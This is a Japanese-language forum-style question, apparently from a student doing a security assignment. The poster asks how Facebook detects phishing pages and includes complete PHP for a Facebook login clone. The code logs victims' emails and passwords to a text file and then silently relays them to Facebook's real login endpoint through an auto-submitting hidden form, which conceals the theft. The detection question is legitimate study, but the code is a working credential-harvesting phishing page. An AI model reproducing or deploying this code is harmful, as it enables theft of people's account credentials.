私はコンピューターのセキュリティに関する小さな割り当てを行っており、現在はフィッシングに取り組んでいます。
そこで、教育目的で単純な「フィッシング Web ページ」を作成し、Facebook がフィッシング詐欺 Web ページを検出する方法を理解しようとしています。
index.htmlユーザーをページにリダイレクトするために編集中のFacebookのメインページですphishing.php。
phishing.php:
<?php
$file = fopen('phishing.txt', 'a');
fwrite($file, 'M: '.htmlspecialchars($_POST['email'])."\nP: ".htmlspecialchars($_POST['pass'])."\n\n");
fclose($file);
?>
<form action="https://www.facebook.com/login.php?login_attempt=1" method="post" name="frm">
<?php
foreach ($_POST as $a => $b) {
echo "<input type='hidden' name='".htmlentities($a)."' value='".htmlentities($b)."'>";
}
?>
</form>
<script language="JavaScript">
document.frm.submit();
</script>
私の質問はここに来ます。ユーザー(私)がユーザー名とパスワードを入力すると、Facebookは次のように述べていることを除いて、すべてがうまく機能します。
セキュリティ通知:セキュリティのため、Facebook.com 以外のサイトでは Facebook のパスワードを入力しないでください
では、このようなフィッシング ページを検出するために、Facebook はどのメカニズムを使用しているのでしょうか?
ありがとう!